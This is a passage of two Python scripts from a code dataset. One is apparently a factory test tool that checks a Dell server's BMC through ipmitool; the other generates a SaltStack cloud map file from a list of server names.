0x04)\n\telse:\n\t\tprint(\"\\033[32;1m%s\\033[0m\"%(PASS_BANNER))\n\n\tLog(\"Log File: %s\"%(os.path.join(LOG_DIR, LOG_FILE)), FONT_GREEN)\n\tLog(\"PASS\", FONT_GREEN)\n\tsys.exit(0)\n#===============================================================================\ndef Show_Fail(error_msg):\n\tif(sys.platform == 
\"win32\"):\n\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x04 | 0x08)\n\t\tprint(FAIL_BANNER)\n\t\tctypes.windll.kernel32.SetConsoleTextAttribute(ctypes.windll.kernel32.GetStdHandle(-11), 0x01 | 0x02 | 0x04)\n\telse:\n\t\tprint(\"\\033[31;1m%s\\033[0m\"%(FAIL_BANNER))\n\n\tLog(\"Log File: %s\"%(os.path.join(LOG_DIR, LOG_FILE)), FONT_RED)\n\tLog(\"Error Message: %s\"%(error_msg), FONT_RED)\n\tLog(\"FAIL\", FONT_RED)\n\tsys.exit(-1)\n#===============================================================================\ndef Input_CMD_OS(cmd):\n\tLog(\"Input OS Command: %s\"%(cmd), FONT_YELLOW)\n\n\ttry:\n\t\tret = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell = True, universal_newlines = True).communicate()[0].splitlines()\n\texcept:\n\t\tLog(\"Input OS Command Fail (%s)\"%(cmd), FONT_RED)\n\t\treturn False\n\n\tfor i in range(len(ret)):\n\t\tret[i] = ret[i].strip()\n\t\tif(DEBUG_MODE):\n\t\t\tLog(\"ret[%02d] %s\"%(i, ret[i]), FONT_WHITE)\n\n\treturn ret\n#===============================================================================\ndef check_bmc_selftest():\n\t'''Check BMC Selftest Result'''\n\n\tflag_selftest = False\n\n\tret = Input_CMD_OS(\"ipmitool mc selftest\")\n\tif(ret == False):\n\t\treturn False\n\n\tfor i in ret:\n\t\tif(\"Selftest:\" in i and \"passed\" in i):\n\t\t\tflag_selftest = True\n\n\tif(flag_selftest == True):\n\t\tLog(\"Check BMC Selftest Result Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tLog(\"Check BMC Selftest Result Fail\", FONT_RED)\n\t\treturn False\n#===============================================================================\ndef check_bmc_version():\n\t'''Check BMC FW Version'''\n\n\tflag_version = False\n\tflag_minor1 = False\n\tflag_minor2 = False\n\tflag_minor3 = False\n\tflag_minor4 = False\n\n\tret = Input_CMD_OS(\"ipmitool mc info\")\n\tif(ret == False):\n\t\treturn False\n\n\tfor i in range(len(ret)):\n\t\tif(\"Firmware Revision\" in ret[i] and \"2.40\" in ret[i]):\n\t\t\tflag_version = True\n\t\tif(\"Aux Firmware Rev Info\" in ret[i]):\n\t\t\tif(\"0x00\" in ret[i + 1]):\n\t\t\t\tflag_minor1 = True\n\t\t\tif(\"0x2d\" in ret[i + 2]):\n\t\t\t\tflag_minor2 = True\n\t\t\tif(\"0x28\" in ret[i + 3]):\n\t\t\t\tflag_minor3 = True\n\t\t\tif(\"0x28\" in ret[i + 4]):\n\t\t\t\tflag_minor4 = True\n\n\tif(flag_version and flag_minor1 and flag_minor2 and flag_minor3 and flag_minor4):\n\t\tLog(\"Check BMC FW Version Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tif(flag_version == False):\n\t\t\tLog(\"Check BMC FW Version Fail (Major Version)\", FONT_RED)\n\t\tif(flag_minor1 == False):\n\t\t\tLog(\"Check BMC FW Version Fail (Minor Version 1)\", FONT_RED)\n\t\tif(flag_minor2 == False):\n\t\t\tLog(\"Check BMC FW Version Fail (Minor Version 2)\", FONT_RED)\n\t\tif(flag_minor3 == False):\n\t\t\tLog(\"Check BMC FW Version Fail (Minor Version 3)\", FONT_RED)\n\t\tif(flag_minor4 == False):\n\t\t\tLog(\"Check BMC FW Version Fail (Minor Version 4)\", FONT_RED)\n\t\treturn False\n#===============================================================================\ndef check_bmc_fru():\n\t'''Check BMC FRU ID 0'''\n\n\tglobal SERVICE_TAG\n\tglobal ASSET_TAG\n\n\tflag_board_mfg = False\n\tflag_board_product_name = False\n\tflag_board_product_number = False\n\n\tflag_product_mfg = False\n\tflag_product_name = False\n\tflag_product_version = False\n\t# flag_product_part = False\n\tflag_product_part = True\n\tflag_product_serial = False\n\tflag_product_asset = False\n\n\t# flag_chassis_type = False\n\t# flag_chassis_part = 
False\n\t# flag_chassis_serial = False\n\tflag_chassis_type = True\n\tflag_chassis_part = True\n\tflag_chassis_serial = True\n\n\tret = Input_CMD_OS(\"ipmitool fru print 0\")\n\tif(ret == False):\n\t\treturn False\n\n\tfru_id = 0\n\n\tfor i in ret:\n\t\tif(\"Board Mfg\" in i and \"DELL\" in i):\n\t\t\tflag_board_mfg = True\n\t\tif(\"Board Product\" in i and \"DSS 9500M\" in i):\n\t\t\tflag_board_product_name = True\n\t\tif(\"Board Part Number\" in i and \"0G50D4A01\" in i):\n\t\t\tflag_board_product_number = True\n\n\t\tif(\"Product Manufacturer\" in i and \"DELL\" in i):\n\t\t\tflag_product_mfg = True\n\t\tif(\"Product Name\" in i and \"DSS 9500M\" in i):\n\t\t\tflag_product_name = True\n\t\tif(\"Product Version\" in i and \"01\" in i):\n\t\t\tflag_product_version = True\n\t\tif(\"Product Part Number\" in i and \"NGNW1\" in i):\n\t\t\tflag_product_part = True\n\t\tif(\"Product Serial\" in i and SERVICE_TAG in i):\n\t\t\tflag_product_serial = True\n\t\tif(\"Product Asset\" in i and ASSET_TAG in i):\n\t\t\tflag_product_asset = True\n\n\t\tif(\"Chassis Type\" in i and \"Rack Mount Chassis\" in i):\n\t\t\tflag_chassis_type = True\n\t\tif(\"Chassis Part Number\" in i and \"D57D2\" in i):\n\t\t\tflag_chassis_part = True\n\t\tif(\"Chassis Serial\" in i and SERVICE_TAG in i):\n\t\t\tflag_chassis_serial = True\n\n\tif(flag_board_mfg and flag_board_product_name and flag_board_product_number and flag_product_mfg and flag_product_name and flag_product_version and flag_product_part and flag_product_serial and flag_product_asset and flag_chassis_type and flag_chassis_part and flag_chassis_serial):\n\t\tLog(\"Check BMC FRU ID 0 Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tif(flag_board_mfg == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Board Mfg)\"%(fru_id), FONT_RED)\n\t\tif(flag_board_product_name == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Board Product)\"%(fru_id), FONT_RED)\n\t\tif(flag_board_product_number == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Board Part Number)\"%(fru_id), FONT_RED)\n\t\tif(flag_product_mfg == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Product Manufacturer)\"%(fru_id), FONT_RED)\n\t\tif(flag_product_name == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Product Name)\"%(fru_id), FONT_RED)\n\t\tif(flag_product_version == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Product Version)\"%(fru_id), FONT_RED)\n\t\tif(flag_product_part == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Product Part Number)\"%(fru_id), FONT_RED)\n\t\tif(flag_product_serial == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Product Serial)\"%(fru_id), FONT_RED)\n\t\tif(flag_product_asset == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Product Asset)\"%(fru_id), FONT_RED)\n\t\tif(flag_chassis_type == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Chassis Type)\"%(fru_id), FONT_RED)\n\t\tif(flag_chassis_part == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Chassis Part Number)\"%(fru_id), FONT_RED)\n\t\tif(flag_chassis_serial == False):\n\t\t\tLog(\"Check BMC FRU ID %d Fail (Chassis Serial)\"%(fru_id), FONT_RED)\n\t\treturn False\n#===============================================================================\ndef check_bmc_chassis():\n\t'''Check BMC Chassis Status'''\n\n\tflag_system_power = False\n\tflag_system_overload = False\n\tflag_power_fault = False\n\tflag_drive_fault = False\n\t# must start False so the \"Cooling/Fan Fault\" line is actually verified\n\tflag_fan_fault = False\n\n\tret = Input_CMD_OS(\"ipmitool chassis status\")\n\tif(ret == False):\n\t\treturn False\n\n\tfor i in ret:\n\t\tif(\"System Power\" in i and \"on\" in 
i):\n\t\t\tflag_system_power = True\n\t\tif(\"Power Overload\" in i and \"false\" in i):\n\t\t\tflag_system_overload = True\n\t\tif(\"Main Power Fault\" in i and \"false\" in i):\n\t\t\tflag_power_fault = True\n\t\tif(\"Drive Fault\" in i and \"false\" in i):\n\t\t\tflag_drive_fault = True\n\t\tif(\"Cooling/Fan Fault\" in i and \"false\" in i):\n\t\t\tflag_fan_fault = True\n\n\tif(flag_system_power and flag_system_overload and flag_power_fault and flag_drive_fault and flag_fan_fault):\n\t\tLog(\"Check BMC Chassis Status Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tif(flag_system_power == False):\n\t\t\tLog(\"Check BMC Chassis Status Fail (System Power)\", FONT_RED)\n\t\tif(flag_system_overload == False):\n\t\t\tLog(\"Check BMC Chassis Status Fail (System Overload)\", FONT_RED)\n\t\tif(flag_power_fault == False):\n\t\t\tLog(\"Check BMC Chassis Status Fail (Power Fault)\", FONT_RED)\n\t\tif(flag_drive_fault == False):\n\t\t\tLog(\"Check BMC Chassis Status Fail (Drive Fault)\", FONT_RED)\n\t\tif(flag_fan_fault == False):\n\t\t\tLog(\"Check BMC Chassis Status Fail (Fan Fault)\", FONT_RED)\n\t\treturn False\n#===============================================================================\ndef check_bmc_lan():\n\t'''Check BMC LAN Status'''\n\n\tflag_ip_source = False\n\n\tret = Input_CMD_OS(\"ipmitool lan print\")\n\tif(ret == False):\n\t\treturn False\n\n\tfor i in ret:\n\t\tif(\"IP Address Source\" in i and \"DHCP Address\" in i):\n\t\t\tflag_ip_source = True\n\n\tflag_lan_port = False\n\n\tret = Input_CMD_OS(\"ipmitool delloem lan get\")\n\tif(ret == False):\n\t\treturn False\n\n\tfor i in ret:\n\t\tif(\"dedicated\" in i):\n\t\t\tflag_lan_port = True\n\n\tif(flag_ip_source and flag_lan_port):\n\t\tLog(\"Check BMC LAN Status Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tif(flag_ip_source == False):\n\t\t\tLog(\"Check BMC LAN Status Fail (IP Address Source)\", FONT_RED)\n\t\tif(flag_lan_port == False):\n\t\t\tLog(\"Check BMC LAN Status Fail (LAN Port)\", FONT_RED)\n\t\treturn False\n#===============================================================================\ndef check_bmc_sdr():\n\t'''Check BMC SDR Information'''\n\n\tflag_sdr_status = True\n\n\tret = Input_CMD_OS(\"ipmitool sdr elist full\")\n\tif(ret == False):\n\t\treturn False\n\n\tfor i in ret:\n\t\tif(i != \"\"):\n\t\t\tret_list = i.split(\"|\")\n\t\t\tfor j in range(len(ret_list)):\n\t\t\t\tret_list[j] = ret_list[j].strip()\n\n\t\t\tif(ret_list[2] != \"ns\" and ret_list[2] != \"ok\" and ret_list[2] != \"lcr\" and ret_list[2] != \"ucr\"):\n\t\t\t\tflag_sdr_status = False\n\t\t\t\tbreak\n\n\tif(flag_sdr_status == True):\n\t\tLog(\"Check BMC SDR Information Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tLog(\"Check BMC SDR Information Fail (%s)\"%(ret_list[0]), FONT_RED)\n\t\treturn False\n#===============================================================================\ndef check_bmc_sensor():\n\t'''Check BMC Sensor Information'''\n\n\tflag_sensor_status = True\n\n\tret = Input_CMD_OS(\"ipmitool sensor\")\n\tif(ret == False):\n\t\treturn False\n\n\tcheck_list = [\"error\", \"err\", \"fault\", \"critical\", \"fail\", \"failure\"]\n\n\tfor i in ret:\n\t\tif(i != \"\"):\n\t\t\tret_list = i.split(\"|\")\n\t\t\tfor j in range(len(ret_list)):\n\t\t\t\tret_list[j] = ret_list[j].strip()\n\n\t\t\tfor item in check_list:\n\t\t\t\tif(item in ret_list[3]):\n\t\t\t\t\tflag_sensor_status = False\n\t\t\t\t\tbreak\n\t\t\tif(flag_sensor_status == False):\n\t\t\t\t# stop at the first bad sensor so the Fail log reports that sensor\n\t\t\t\tbreak\n\tif(flag_sensor_status):\n\t\tLog(\"Check BMC Sensor Information Pass\", FONT_GREEN)\n\t\treturn 
True\n\telse:\n\t\tLog(\"Check BMC Sensor Information Fail (%s)\"%(ret_list[0]), FONT_RED)\n\t\treturn False\n#===============================================================================\ndef check_bmc_sel():\n\t'''Check BMC SEL Information'''\n\n\tflag_sel_overflow = True\n\n\n\tret = Input_CMD_OS(\"ipmitool sel\")\n\tif(ret == False):\n\t\treturn False\n\n\tfor i in ret:\n\t\tif(\"Overflow\" in i and \"false\" not in i):\n\t\t\tflag_sel_overflow = False\n\t\t\tbreak\n\tflag_sel = True\n\n\tret = Input_CMD_OS(\"ipmitool sel list\")\n\tif(ret == False):\n\t\treturn False\n\n\tcheck_list = [\"error\", \"err\", \"fault\", \"critical\", \"fail\", \"failure\"]\n\n\tindex = 0\n\tfor index in range(len(ret)):\n\t\tfor item in check_list:\n\t\t\tif(item in ret[index]):\n\t\t\t\tflag_sel = False\n\t\t\t\tbreak\n\n\tif(flag_sel_overflow and flag_sel):\n\t\tLog(\"Check BMC SEL Information Pass\", FONT_GREEN)\n\t\treturn True\n\telse:\n\t\tif(flag_sel_overflow == False):\n\t\t\tLog(\"Check BMC SEL Information Fail (SEL Overflow)\", FONT_RED)\n\t\tif(flag_sel == False):\n\t\t\tLog(\"Check BMC SEL Information Fail (%s)\"%(ret[index]), FONT_RED)\n\t\treturn False\n#===============================================================================\ndef main():\n\tglobal VER\n\tglobal DEBUG_MODE\n\tglobal FAIL_CONTINUE\n\tglobal LOG_DIR\n\tglobal LOG_FILE\n\tglobal SERVICE_TAG\n\tglobal ASSET_TAG\n\n\tINIT()\n\n\tBanner(\"MiG5 iDRAC FVS Tool, By Foxconn CESBG-EPDI-TE, Version: %s\"%(VER))\n\n\tif(DEBUG_MODE):\n\t\tLog(\"DEBUG_MODE\", FONT_WHITE)\n\tif(FAIL_CONTINUE):\n\t\tLog(\"FAIL_CONTINUE\", FONT_WHITE)\n\n\tLog(\"Log Directory: %s\"%(LOG_DIR), FONT_WHITE)\n\tLog(\"Log File: %s\"%(LOG_FILE), FONT_WHITE)\n\n\ttest_sequence = [\n\t\tcheck_bmc_selftest,\n\t\tcheck_bmc_version,\n\t\tcheck_bmc_fru,\n\t\tcheck_bmc_chassis,\n\t\tcheck_bmc_lan,\n\t\tcheck_bmc_sdr,\n\t\tcheck_bmc_sensor,\n\t\tcheck_bmc_sel,\n\t]\n\n\ttest_result = True\n\tresult_msg = []\n\n\ttest_start = datetime.datetime.now()\n\tLog(\"Test Start...\", FONT_YELLOW)\n\tfor test_item in test_sequence:\n\t\tLog(\"=\"*58, FONT_NONE)\n\t\tBanner(test_item.__doc__)\n\t\tLog(\"Test Item: %s (%s)\"%(test_item.__doc__, test_item.__name__), FONT_YELLOW)\n\t\ttime.sleep(1)\n\t\tif(test_item() == False):\n\t\t\ttest_result = False\n\t\t\tresult_msg.append((test_item.__name__, False))\n\t\t\tif(FAIL_CONTINUE):\n\t\t\t\traw_input(\"%s Fail!! 
Press ENTER to Continue...\"%(test_item.__doc__))\n\t\t\telse:\n\t\t\t\tbreak\n\t\telse:\n\t\t\tresult_msg.append((test_item.__name__, True))\n\t\ttime.sleep(1)\n\t\tLog(\"=\"*58, FONT_NONE)\n\tLog(\"Test End...\", FONT_YELLOW)\n\ttest_end = datetime.datetime.now()\n\n\tprint(\"\")\n\tLog(\"Test Start: %s\"%(str(test_start)), FONT_YELLOW)\n\tLog(\"Test End: %s\"%(str(test_end)), FONT_YELLOW)\n\tLog(\"Test Time: %s\"%(str(test_end - test_start)), FONT_YELLOW)\n\tprint(\"\")\n\tfor (item_name, result) in result_msg:\n\t\tif(result):\n\t\t\tmsg = item_name.ljust(52, \"-\") + \"[PASS]\"\n\t\t\tLog(msg, FONT_GREEN)\n\t\telse:\n\t\t\tmsg = item_name.ljust(52, \"-\") + \"[FAIL]\"\n\t\t\tLog(msg, FONT_RED)\n\tprint(\"\")\n\n\tif(test_result):\n\t\tShow_Pass()\n\telse:\n\t\tShow_Fail(\"%s Fail\"%(test_item.__doc__))\n#===============================================================================\nif(__name__ == \"__main__\"):\n\ttry:\n\t\tmain()\n\texcept Exception as e:\n\t\tprint(\"ERROR: %s\"%(str(e)))\n\t\tsys.exit(-1)\n\tsys.exit(0)\n","sub_path":"MiG5/MiG5_iDRAC_FVS_Tool.py","file_name":"MiG5_iDRAC_FVS_Tool.py","file_ext":"py","file_size_in_byte":18429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"530223008","text":"#!/usr/bin/env python\nimport sys,os\nfrom optparse import OptionParser\n\n\n# get server and asamPlatformSet\ndef getServerAndAsam ( line ):\n infoList = line.split()\n if (len(infoList) == 1):\n host = line.rstrip('\\n')\n asamPlatformSet = 'All_HCISutil'\n elif (len(infoList) == 2):\n host = infoList[0]\n asamPlatformSet = infoList[1].rstrip('\\n')\n return [host, asamPlatformSet]\n\n# get FQDN from the input host name\ndef convertFQDN ( host ):\n FQDN = host.rstrip('\\n') + '.clemson.edu'\n return FQDN\n\n# get IP from the input host name\ndef convertIP ( host ):\n fqdn = convertFQDN( host )\n addr = os.popen( 'dig +short ' + fqdn ).read()\n IP = addr.rstrip('\\n')\n return IP\n\n# get Vlan Info\ndef getVLAN ( ipAddr ):\n vlanCode = ipAddr.split('.')[2]\n vlaninfo = open('/etc/salt/cloud.file.d/vlaninfo', 'r') \n for vlan in vlaninfo.readlines():\n if (vlanCode == vlan.split(' ')[0]):\n VLAN = vlan.split(' ')[1].rstrip('\\n')\n return VLAN\n\n# read server list for generating map file\ndef readList ( file ):\n SERVERS = open(file,'r').readlines()\n return SERVERS\n\n# write profile:\ndef writeProfile ( map ):\n profile = options.profile\n map.write(profile + \":\\n\")\n\ndef getGateway ( ip ):\n GATEWAY = ip.replace(ip.split('.')[-1], '1')\n return GATEWAY\n\ndef getGrainRole ( host ):\n ROLE = host.split('-')[-1][0:3]\n return ROLE\n\ndef getGrainProject ( host ):\n PROJ = host.split('-')[1]\n return PROJ\n\nif __name__ == '__main__':\n # add options:\n usage = \"usage: %prog -l servers.list\"\n\n parser = OptionParser(usage=usage)\n parser.add_option(\"-l\", \"--list\", dest=\"servers\", help=\"Read the list of servers to be built\")\n parser.add_option(\"-p\", \"--profile\", dest=\"profile\", help=\"Profile template to use\", default=\"oel6.6-default\")\n parser.add_option(\"-s\", \"--switch\", dest=\"switch\", help=\"Switch type for network\", default=\"standard\")\n (options, args) = parser.parse_args()\n serverList = readList( options.servers )\n \n # the target map file to be generated\n map = open(\"test.map\", \"w+\")\n writeProfile (map)\n\n for line in serverList:\n [server, asam] = getServerAndAsam( line )\n fqdn = 
convertFQDN( server )\n ip = convertIP( server ) \n vlan = getVLAN( ip )\n gateway = getGateway( ip ) \n role = getGrainRole( server ) \n proj = getGrainProject( server ) \n \n map.write('%4s%s' % ('- ',fqdn+':\\n' ))\n map.write('%6s%s' % ('','devices:\\n')) \n map.write('%8s%s' % ('','networker:\\n')) \n map.write('%10s%s' % ('','name: '+ vlan + '\\n')) \n map.write('%10s%s' % ('','switch_type: ' + options.switch + '\\n' )) \n map.write('%10s%s' % ('','ip: ' + ip + '\\n' )) \n map.write('%10s%s' % ('','gateway: [' + gateway + ']\\n')) \n map.write('%10s%s' % ('','subnet_mask: 255.255.255.0\\n')) \n map.write('%10s%s' % ('','domain: clemson.edu\\n')) \n map.write('%6s%s' % ('','minion:\\n')) \n map.write('%8s%s' % ('','id: ' + fqdn +'\\n')) \n map.write('%6s%s' % ('','grains:\\n')) \n map.write('%8s%s' % ('','role: ' + role +'\\n')) \n map.write('%8s%s' % ('','project: ' + proj +'\\n')) \n map.write('%8s%s' % ('','asamPlatformSet: ' + asam +'\\n')) \n","sub_path":"buildMap.py","file_name":"buildMap.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}